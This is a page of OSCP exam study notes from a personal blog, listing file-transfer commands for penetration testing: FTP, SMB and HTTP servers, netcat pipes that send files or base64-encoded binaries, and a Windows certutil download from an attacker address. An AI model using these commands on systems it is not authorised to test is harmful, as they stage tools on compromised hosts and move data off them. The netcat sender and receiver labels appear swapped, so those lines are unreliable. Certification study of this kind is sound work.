Adithyan's Blog
Search…
Adithyan's Blog
whoami
How I Won 90 Days OSCP Lab Voucher for Free
OSCP Preparation Guide
Enumeration
80, 443
Linux Privilege Escalation
Windows Privilege Escalation
Linux Reverse Shells
Windows Reverse Shells
File Transfers
Cryptography
Pivot
Buffer Overflows
Binary
Misc
Tips
Resources
CEH Practical Notes
Red Teaming
DevOps
Bio
Powered By
GitBook
File Transfers
Set up FTP :
Python pyftpdlib FTP Server (again don't run from TMUX):
apt-get install python-pyftpdlib
[email protected]
# python -m pyftpdlib -p 21
SMB
: impacket-smbserver tmp .
HTTP :
python -m SimpleHTTPServer
python3 -m http.server
updog (
https://github.com/sc0tfree/updog
)
Linux :
curl
wget
Netcat
// Receiver
nc 192.168.0.1 4444 < file
// Sender
cat file | nc -nlvp 4444 // Normal file
// Base64 encoded sender
cat binary | base64 | nc -nlvp 4444
Windows :
certutil -urlcache -f http://<ip>/uri output.ext
//10.10.10.x/smb
Previous
Windows Reverse Shells
Next
Cryptography
Last modified
1yr ago
Copy link